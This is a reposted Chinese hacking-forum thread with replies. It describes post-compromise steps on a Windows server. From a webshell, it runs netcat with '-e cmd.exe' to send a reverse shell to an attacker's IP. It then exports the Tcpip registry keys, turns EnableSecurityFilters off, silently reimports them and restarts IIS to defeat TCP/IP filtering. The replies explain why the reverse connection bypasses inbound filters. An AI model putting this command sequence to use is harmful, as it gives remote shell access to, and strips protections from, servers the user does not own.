[转载]解除TCP/IP限制的小技巧
作者:河马史诗1.用NC反弹得到一个shell
本机监听 NC -l -p 32
WEBSHELL运行:
x:\xxx\serv-u.exe "x:\xxx\nc.exe -e cmd.exe *.*.*.* port"
得到一个shell
2.CMD下导出注册表文件
C:\>regedit -e x:\xxx\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Ser
vices\Tcpip
C:\>regedit -e x:\xxx\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
C:\>regedit -e x:\xxx\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
修改各文件 EnableSecurityFilters 处
将最后的1改为0
3.将注册表文件导入
x:\xxx>regedit -s 1.reg
x:\xxx>regedit -s 2.reg
x:\xxx>regedit -s 3.reg
-S 为无提示
重启命令 iisreset /reboot
完成TCP/IP筛选限制
前几天碰到一台这样的主机,这么搞很成功。
很久没来火狐老大的站了。来学习学习
很老的技术 就当灌水了 NC -l -p 32是···监听本地端口32??这个跟后面的有什么联系吗?32端口是干什么的啊?没有一点点印象!! 就是反向给自己一个shell呀!!!,可是本身TCP/IP限制了,他又怎么反向连接呢?
难道是说解除TCP/IP限制,供下一步入侵????不懂也,偶菜鸟啊~~~~~ TCP/IP筛选只是限制外部对本机端口的连接而不会限制本机对外的连接
所以NC反向是可行的.... [quote][b]下面是引用wiyn于05-01-2005 18:38发表的:[/b]
TCP/IP筛选只是限制外部对本机端口的连接而不会限制本机对外的连接
所以NC反向是可行的....[/quote]
呵呵tcp/ip筛选只要没有选镜象规则都是但方面的~同意你的观点~
页:
[1]